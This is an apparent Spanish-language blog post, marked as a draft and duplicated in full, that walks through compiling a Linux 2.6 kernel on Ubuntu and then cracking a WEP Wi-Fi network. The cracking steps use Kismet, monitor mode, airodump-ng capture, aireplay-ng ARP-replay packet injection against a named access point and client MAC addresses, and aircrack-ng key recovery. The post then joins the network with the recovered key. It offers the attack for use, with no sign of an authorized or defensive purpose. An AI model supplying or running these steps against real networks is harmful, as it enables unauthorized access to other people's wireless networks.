Crack wep Wifi con Kernel 2.6
BORRADOR - BORRADOR - BORRADOR - BORRADOR - BORRADOR - BORRADOR
Un amigo me pidió que viera como hacer funcionar el proceso de crack que tenía hecho pero en un Kernel 2.6, asi que me puse a ello.
Mi proceso anterior, funcionaba en un kernel 2.4, aunque no era imposible, no sabía como hacerlo en un 2.6.
En base a este link, aprendí como compilar el 2.6 y preparar una portatil para crack de wep.(wifi)
http://elmodem.wordpress.com/2006/11/09/como-compilar-el-kernel-de-kubuntu/
Boot de un ubuntú con 2.6.17-10-generic
(en mi caso la version amd 64 bits)
Sobre la instalacion desktop normal, agregar varios paquetes.
___ su root
(para trabajar como root y evitarme problemas)
Agregar fuentes de repositorios, porque los que trae Ubuntu por default no son todos.
___ cd /etc/apt
___ vi sources.list
Y quitar los DEB que tienen el comentario delante #
Son varios. Como decía mi abuela, "lo que abunda no daña."
Luego instalar mas paquetes. (puede que tengan algunos ya instalados)
___ apt-get install build-essential kernel-package hostapd mc linux-source libncurses5 libncurses5-dev aircrack-ng
(el source que instaló es el 2.6.17-13)
El instalar el source, solo crea un fichero en /usr/src con el fuente compactado,
usando el MC, lo descompacto y creo la carpeta correcta, algo similar a Linux-source-2.6.17.
(ese nombre puede variar, se puede descompactar tambien con tar -xvf)
luego crear un link simbólico a esa carpeta, llamándolo Linux con esto:
ln -s /usr/src/linux-source**** /usr/src/linux
Luego limpiar posibles compiladas anteriores.
___ make-kpkg clean
Copiar fichero de configuracion del kernel actual.
___ cp /boot/config-2.6.17-10-generic /usr/src/.config
Luego ver que pueda cambiar opciones del kernel, agregar o quitar módulos y demas.
(en este caso, no cambiamos nada, solo miramos las opciones)
___ make menuconfig
(si esto no funciona, puede ser por bibliotecas ncurses)
Luego compilamos el kernel. Con 2.6 es un poco mas sencillo todo el proceso.
___ make-kpkg -append-to-version=.deco1 -initrd kernel_image
Luego nos paramos en la carpeta Sources.
___ cd /usr/src
E instalamos el nuevo kernel
___ dpkg -i kernel-image-2.6.15.7-ubuntu1.deco1_2.6.17.13-ubuntu1.ubuntu1-10.00.Custom_amd64.deb
En esa instalacion, crea entradas en GRUB, en MENU.LST y prepara todo para el nuevo reinicio.
Luego
___ reboot
y seguramente todo ira bien.
****** AHORA EL CRACK WEP ******
En /etc/modules agregar hostap y hostap_cs, para que cargue esos módulos en cada arranque.
___ vi /etc/modules
* editar el /etc/kismet/kismet.conf (hostap,wlan0,Prism2)
(yo uso una placa d-link dwl650, puede que al usar otras el PRISM2 haya que cambiarlo)
* Correr Kismet, ver red y detectar el AP ( CISCO 00:40:96:a2:79:EE ch.9)
* ifconfig -a , para ver todas las placas, debe aparecer wlan0 y wifi0
* iwconfig wlan0 mode monitor (para activar monitor RF)
* ifconfig wlan0 promisc
* ifconfig wlan0 (para ver caracteristicas de la placa dlink)
* NO Dejar corriendo KISMET
* En otra ventana
airodump-ng --channel 9 -b CISCO wlan0 -w temp1
ver clientes conectados al AP, obtener MAC del AP y de algun cliente
00:c0:49:f6:37:3d
00:15:00:36:54:6f
00:11:0A:80:F5:88
00:0F:20:93:C1:55
00:14:C2:51:77:F1
* EN OTRA VENTANA
aireplay-ng -3 -g 180 -r temp1-01.cap -b 00:40:96:A2:79:EE -h 00:C0:49:F6:37:3D wlan0
Esto inyectará paquetes para el AP desde un cliente.
Si el texto "GOT nnnn ARP Request" no aumenta rapidametne, es que algo va mal.
* EN OTRA VENTANA
aircrack-ng -a 1 replay_arp-1016-173322.cap
Esto intentará obtener el código WEP (esto es realmente el CRACK)
* PRUEBA DE QUE EL CRACK ES CORRECTO
iwconfig wlan0 mode Managed key 22:05:19:79:30:03:19:76:17:03:19:82:27 essid CISCO
Asociarse al AP, poniendo el KEY. Quizás luego hacer un dhclient para obtener IP, luego ping a
www.google.es y deberia funcionar.
AHHHH me olvidaba, Felices Navidades !!!!
Un amigo me pidió que viera como hacer funcionar el proceso de crack que tenía hecho pero en un Kernel 2.6, asi que me puse a ello.
Mi proceso anterior, funcionaba en un kernel 2.4, aunque no era imposible, no sabía como hacerlo en un 2.6.
En base a este link, aprendí como compilar el 2.6 y preparar una portatil para crack de wep.(wifi)
http://elmodem.wordpress.com/2006/11/09/como-compilar-el-kernel-de-kubuntu/
Boot de un ubuntú con 2.6.17-10-generic
(en mi caso la version amd 64 bits)
Sobre la instalacion desktop normal, agregar varios paquetes.
___ su root
(para trabajar como root y evitarme problemas)
Agregar fuentes de repositorios, porque los que trae Ubuntu por default no son todos.
___ cd /etc/apt
___ vi sources.list
Y quitar los DEB que tienen el comentario delante #
Son varios. Como decía mi abuela, "lo que abunda no daña."
Luego instalar mas paquetes. (puede que tengan algunos ya instalados)
___ apt-get install build-essential kernel-package hostapd mc linux-source libncurses5 libncurses5-dev aircrack-ng
(el source que instaló es el 2.6.17-13)
El instalar el source, solo crea un fichero en /usr/src con el fuente compactado,
usando el MC, lo descompacto y creo la carpeta correcta, algo similar a Linux-source-2.6.17.
(ese nombre puede variar, se puede descompactar tambien con tar -xvf)
luego crear un link simbólico a esa carpeta, llamándolo Linux con esto:
ln -s /usr/src/linux-source**** /usr/src/linux
Luego limpiar posibles compiladas anteriores.
___ make-kpkg clean
Copiar fichero de configuracion del kernel actual.
___ cp /boot/config-2.6.17-10-generic /usr/src/.config
Luego ver que pueda cambiar opciones del kernel, agregar o quitar módulos y demas.
(en este caso, no cambiamos nada, solo miramos las opciones)
___ make menuconfig
(si esto no funciona, puede ser por bibliotecas ncurses)
Luego compilamos el kernel. Con 2.6 es un poco mas sencillo todo el proceso.
___ make-kpkg -append-to-version=.deco1 -initrd kernel_image
Luego nos paramos en la carpeta Sources.
___ cd /usr/src
E instalamos el nuevo kernel
___ dpkg -i kernel-image-2.6.15.7-ubuntu1.deco1_2.6.17.13-ubuntu1.ubuntu1-10.00.Custom_amd64.deb
En esa instalacion, crea entradas en GRUB, en MENU.LST y prepara todo para el nuevo reinicio.
Luego
___ reboot
y seguramente todo ira bien.
****** AHORA EL CRACK WEP ******
En /etc/modules agregar hostap y hostap_cs, para que cargue esos módulos en cada arranque.
___ vi /etc/modules
* editar el /etc/kismet/kismet.conf (hostap,wlan0,Prism2)
(yo uso una placa d-link dwl650, puede que al usar otras el PRISM2 haya que cambiarlo)
* Correr Kismet, ver red y detectar el AP ( CISCO 00:40:96:a2:79:EE ch.9)
* ifconfig -a , para ver todas las placas, debe aparecer wlan0 y wifi0
* iwconfig wlan0 mode monitor (para activar monitor RF)
* ifconfig wlan0 promisc
* ifconfig wlan0 (para ver caracteristicas de la placa dlink)
* NO Dejar corriendo KISMET
* En otra ventana
airodump-ng --channel 9 -b CISCO wlan0 -w temp1
ver clientes conectados al AP, obtener MAC del AP y de algun cliente
00:c0:49:f6:37:3d
00:15:00:36:54:6f
00:11:0A:80:F5:88
00:0F:20:93:C1:55
00:14:C2:51:77:F1
* EN OTRA VENTANA
aireplay-ng -3 -g 180 -r temp1-01.cap -b 00:40:96:A2:79:EE -h 00:C0:49:F6:37:3D wlan0
Esto inyectará paquetes para el AP desde un cliente.
Si el texto "GOT nnnn ARP Request" no aumenta rapidametne, es que algo va mal.
* EN OTRA VENTANA
aircrack-ng -a 1 replay_arp-1016-173322.cap
Esto intentará obtener el código WEP (esto es realmente el CRACK)
* PRUEBA DE QUE EL CRACK ES CORRECTO
iwconfig wlan0 mode Managed key 22:05:19:79:30:03:19:76:17:03:19:82:27 essid CISCO
Asociarse al AP, poniendo el KEY. Quizás luego hacer un dhclient para obtener IP, luego ping a
www.google.es y deberia funcionar.
AHHHH me olvidaba, Felices Navidades !!!!
Comentarios